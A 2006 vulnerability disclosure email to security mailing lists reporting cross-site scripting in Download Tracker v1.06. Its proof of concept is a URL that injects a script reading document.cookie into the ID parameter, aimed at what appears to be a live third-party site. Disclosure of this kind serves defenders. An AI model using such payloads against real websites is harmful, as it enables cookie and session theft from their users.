From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Sun, 15 Jan 2006 15:40:46 -0500
Subject: [OSVDB Mods] Download Tracker v 1.06 - Cross Site Scripting

Download Tracker v 1.06 - Cross Site Scripting

Vendor URL: http://www.widexl.com/

PoC:

http://simpsonsmania.covers.de/cgi-bin/download/down.pl?ID="><script>alert(document.cookie)</script>


Preddy
RootShell Security Group